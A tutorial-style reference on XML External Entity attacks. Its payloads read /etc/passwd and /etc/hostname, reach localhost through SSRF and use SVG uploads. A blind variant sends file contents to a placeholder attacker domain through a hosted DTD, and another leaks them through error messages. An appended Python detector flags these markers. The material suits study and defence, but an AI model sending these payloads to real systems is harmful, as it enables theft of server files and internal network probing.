XXE

Introduction

An XML External Entity (XXE) processing attack lets an attacker interfere with an application's processing of XML data. The submitted XML contains a reference to an external entity (a local file or an external URL) that the XML parser resolves, which can lead to information disclosure, server-side request forgery (SSRF) and port scanning.

Proof of Concept

The following examples retrieve the file /etc/passwd from the victim system and return its content inside the "name" element.

<!-- EXAMPLE 1 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE comment [
   <!ELEMENT comment ANY >
   <!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&output;</name>
</comment>

<!-- EXAMPLE 2 -->
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name>
</comment>

The same mechanism can also be used to perform SSRF attacks, since the entity may point at a URL instead of a file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE comment [
   <!ELEMENT comment ANY >
   <!ENTITY output SYSTEM "https://localhost/" >]>
<comment>
  <name>&output;</name>
</comment>

Finally, if the application allows SVG images to be uploaded, the image-processing library may parse them as XML (SVG is an XML format), which opens another attack surface.

Once the rendered image is shown to the client, it contains the retrieved information.

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
  <text font-size="16" x="0" y="16">&xxe;</text>
</svg>

Blind XXE (Data out-of-band)

In a blind XXE attack, the attacker cannot see the result of their injection in the response and must rely on indirect methods, such as out-of-band requests, to gather information.

To perform this attack, the attacker first hosts a malicious Document Type Definition (DTD) on a server they control, and then references that external DTD from the DTD sent to the victim's website.

This is an example of retrieving the file /etc/passwd from the victim's website.

<!-- HOSTED MALICIOUS DTD (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<ATTACKER_DOMAIN>/?x=%file;'>">
%eval;
%exfiltrate;

<!-- SUBMITTED DTD -->
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://<ATTACKER_DOMAIN>/malicious.dtd"> %xxe;]>

Blind XXE (Error message)

Another way to retrieve data through an XXE vulnerability is to trigger an XML parsing error. This only works if the application includes the resulting error message in its response, because the error message is what carries the sensitive data.

The payload would be:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
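As an added, defender-side example that is not part of the original page, the following Python check flags the markers every payload above depends on (a DTD, entity declarations, SYSTEM/PUBLIC identifiers, parameter-entity references and the XInclude namespace) before the document reaches a parser. It is defence in depth behind the real fix, which is disabling DTD processing and external entity resolution in the parser itself (for example lxml's resolve_entities=False and no_network=True, or the defusedxml package); the embedded sample documents are constructed from the page's payloads plus one benign document.

```python
import re
import xml.etree.ElementTree as ET

# Markers an untrusted XML document should never carry when the application
# only expects plain data: a DTD (the only place entities can be declared),
# SYSTEM/PUBLIC identifiers, parameter-entity references (%name;) used by the
# blind payloads, and the XInclude namespace. XML keywords are
# case-sensitive, so the patterns are too.
INDICATORS = {
    "doctype": re.compile(r"<!DOCTYPE\b"),
    "entity": re.compile(r"<!ENTITY\b"),
    "system_or_public_id": re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']"),
    "parameter_entity": re.compile(r"%[A-Za-z_][\w.-]*;"),
    "xinclude": re.compile(r"http://www\.w3\.org/2001/XInclude"),
}

def xxe_indicators(xml_text):
    """Return the sorted names of the indicators present in the raw text."""
    return sorted(n for n, rx in INDICATORS.items() if rx.search(xml_text))

def parse_untrusted(xml_text):
    """Refuse documents carrying XXE/XInclude markers, otherwise parse them.
    Run this on decoded text (decode bytes per the declared encoding first)
    so a UTF-16 document cannot slip past the pattern match."""
    found = xxe_indicators(xml_text)
    if found:
        raise ValueError("refusing to parse XML: " + ", ".join(found))
    return ET.fromstring(xml_text)

def rejects(xml_text):
    """True when parse_untrusted refuses the document."""
    try:
        parse_untrusted(xml_text)
    except ValueError:
        return True
    return False

# Constructed samples taken from the page's payloads plus a benign document.
EXAMPLE_FILE_READ = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE comment [ <!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment><name>&output;</name></comment>"""
EXAMPLE_XINCLUDE = """<comment><name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name></comment>"""
EXAMPLE_BLIND = """<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://<ATTACKER_DOMAIN>/malicious.dtd"> %xxe;]>"""
BENIGN = "<comment><name>alice</name></comment>"

if __name__ == "__main__":
    for doc in (EXAMPLE_FILE_READ, EXAMPLE_XINCLUDE, EXAMPLE_BLIND, BENIGN):
        print(xxe_indicators(doc) or "clean")
```

The Python standard library's ElementTree used here does not resolve external entities or process xi:include on its own, so the check is what turns a silent parse failure into an explicit rejection that can be logged and alerted on.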
